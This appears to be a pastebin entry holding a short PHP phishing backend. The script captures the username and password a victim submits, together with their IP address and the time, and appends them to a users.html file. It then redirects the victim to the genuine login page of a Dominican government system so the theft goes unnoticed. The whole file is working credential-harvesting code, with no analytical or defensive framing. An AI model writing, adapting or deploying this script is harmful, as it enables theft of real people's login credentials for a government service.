Untitled
2 years ago by luismanuelpeirb in Plain Text
<?php
header('location: https://sips-superate.000webhostapp.com/index.html');
$f = fopen("users.html", "a");
$usuario = $_POST['UserName'];
$clave = $_POST['Password'];
$ip = $_SERVER['REMOTE_ADDR'];
$fecha = date("Y-m-d;h:i:s");
fwrite ($f,
'User: [<b><font color="#000000">'.$usuario.'</font></b>]
Pass: [<b><font color="#000000">'.$clave.'</font></b>]
IP: [<b><font color="#996600">'.$ip.'</font></b>]
Date: [<b><font color="#FF6633">'.$fecha.'</font></b>]<br> ');
fclose($f);
header('location: https://sips.superate.gob.do/SIPSV2/Account/Login?ReturnUrl=%2fSIPSV2%2f');
?>